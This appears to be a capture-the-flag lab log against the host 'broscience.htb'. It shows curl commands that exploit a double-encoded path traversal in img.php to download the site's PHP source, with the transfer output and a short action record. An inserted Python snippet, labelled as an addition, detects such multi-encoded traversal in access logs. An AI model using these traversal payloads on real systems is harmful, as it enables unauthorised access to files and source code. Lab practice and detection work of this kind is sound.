┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252findex.php > index.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2182 100 2182 0 0 18818 0 --:--:-- --:--:-- --:--:-- 18973
┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252flogin.php > login.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3028 100 3028 0 0 25693 0 --:--:-- --:--:-- --:--:-- 25880
┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252factivate.php > activate.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2026 100 2026 0 0 17418 0 --:--:-- --:--:-- --:--:-- 17465
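A defender-side check for the double-encoded `..%252f` used in the requests above, as an added example that is not part of the original log: it percent-decodes each query value until it stops changing and flags any value that ends up containing a `..` path segment. The log lines, `MAX_ROUNDS` and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

MAX_ROUNDS = 5  # assumption: upper bound on repeated decoding
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a '..' path segment
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in an access log

# Constructed access-log lines (addresses, times and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /includes/img.php?path=bench.png HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /includes/img.php?path=..%252findex.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /includes/img.php?path=..%2findex.php HTTP/1.1" 200 20',
]

def decode_rounds(value):
    """Percent-decode until the value stops changing; return (final, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(target):
    """Findings for query values that contain '..' once fully decoded."""
    findings = []
    # Split the raw query by hand: parse_qs would already decode one layer.
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        final, rounds = decode_rounds(raw)
        if TRAVERSAL.search(final):
            findings.append({"param": name, "raw": raw, "decoded": final,
                             "multi_encoded": rounds >= 2})
    return findings

def scan(lines):
    """Return (line_number, finding) for every flagged request in the log."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, f) for f in classify(match.group(1)))
    return hits

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```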
Person --> Cristian
Time --> 27/02/2023 --> 20:10 --> 20:20
Action --> Path traversal with double encoding (https://owasp.org/www-community/Double_Encoding)
Endpoint --> https://broscience.htb/index.php, https://broscience.htb/login.php, https://broscience.htb/activate.php
Result --> We downloaded source code files from the site using the path traversal in the Local File Inclusion of the img.php file.
Output: